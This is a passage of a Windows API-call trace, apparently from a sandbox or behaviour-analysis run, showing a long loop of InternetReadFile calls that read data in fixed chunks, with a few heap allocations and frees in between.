lpBuffer=0x29a4e68*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.524] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a5250, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a5250*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.524] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a5638, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a5638*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.525] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a5a20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a5a20*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.525] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a5e08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a5e08*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.525] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a61f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a61f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.525] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a65d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a65d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.525] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a69c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a69c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.526] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a6da8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a6da8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.526] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a7190, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a7190*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.526] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a7578, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a7578*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.526] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a7960, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a7960*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.526] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a7d48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a7d48*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.526] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a8130, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a8130*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.526] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a8518, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a8518*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.527] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a8900, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a8900*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.527] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a8ce8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a8ce8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.527] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a90d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a90d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.527] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a94b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a94b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.527] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a98a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a98a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.528] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xf000) returned 0x38ea170 [0106.529] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2758 | out: hHeap=0x29a0000) returned 1 [0106.529] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f16a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f16a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.529] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f1a88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f1a88*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.529] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f1e70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f1e70*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.529] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f2258, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f2258*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.529] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f2640, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f2640*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.529] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f2a28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f2a28*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.530] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f2e10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f2e10*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.530] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f31f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f31f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.530] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f35e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f35e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.530] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f39c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f39c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.530] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f3db0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f3db0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.530] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f4198, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f4198*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.530] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f4580, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f4580*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.530] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f4968, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f4968*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.538] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f4d50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f4d50*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.541] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f5138, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f5138*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.541] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f5520, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f5520*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.541] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f5908, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f5908*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.541] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f5cf0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f5cf0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.541] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f60d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f60d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.542] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f64c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f64c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.542] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f68a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f68a8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.542] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f6c90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f6c90*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.542] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f7078, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f7078*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.542] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f7460, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f7460*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.542] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f7848, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f7848*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.543] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f7c30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f7c30*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.543] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f8018, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f8018*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.543] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f8400, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f8400*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.543] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f87e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f87e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.543] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f8bd0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x38f8bd0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.543] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16800) returned 0x38f9178 [0106.545] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea170 | out: hHeap=0x29a0000) returned 1 [0106.546] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3907fc0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3907fc0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.546] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39083a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39083a8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.546] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3908790, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3908790*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.546] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3908b78, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3908b78*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.546] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3908f60, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3908f60*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.547] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3909348, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3909348*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3909730, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3909730*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3909b18, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3909b18*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3909f00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3909f00*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390a2e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390a2e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390a6d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390a6d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390aab8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390aab8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390aea0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390aea0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390b288, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390b288*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390b670, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390b670*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390ba58, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390ba58*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390be40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390be40*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.550] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390c228, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390c228*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.550] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390c610, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390c610*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.550] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390c9f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390c9f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.550] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390cde0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390cde0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.550] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390d1c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390d1c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.550] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390d5b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390d5b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.551] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390d998, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390d998*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.551] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390dd80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390dd80*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.551] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390e168, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390e168*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.551] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390e550, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390e550*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.551] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390e938, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390e938*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.551] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390ed20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390ed20*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.551] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390f108, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390f108*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.552] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390f4f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390f4f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.552] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1e000) returned 0x390f980 [0106.558] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38f9178 | out: hHeap=0x29a0000) returned 1 [0106.562] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39260e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39260e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.562] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39264c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39264c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.562] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39268b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39268b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.563] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3926c98, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3926c98*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.563] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3927080, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3927080*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.563] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3927468, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3927468*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.563] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3927850, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3927850*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.563] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3927c38, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3927c38*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.563] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3928020, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3928020*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.564] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3928408, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3928408*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.564] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39287f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39287f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.564] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3928bd8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3928bd8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.564] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3928fc0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3928fc0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.564] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39293a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39293a8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.564] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3929790, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3929790*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.565] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3929b78, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3929b78*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.565] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3929f60, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3929f60*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.565] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x392a348, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x392a348*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.565] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x392a730, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x392a730*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.565] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x392ab18, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x392ab18*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.565] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x392af00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x392af00*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.566] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x392b2e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x392b2e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.566] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x392b6d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x392b6d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.566] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x392bab8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x392bab8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.566] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x392bea0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x392bea0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.566] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x392c288, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x392c288*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.566] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x392c670, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x392c670*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.567] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x392ca58, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x392ca58*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.567] InternetReadFile (in: hFile=0xcc000c, 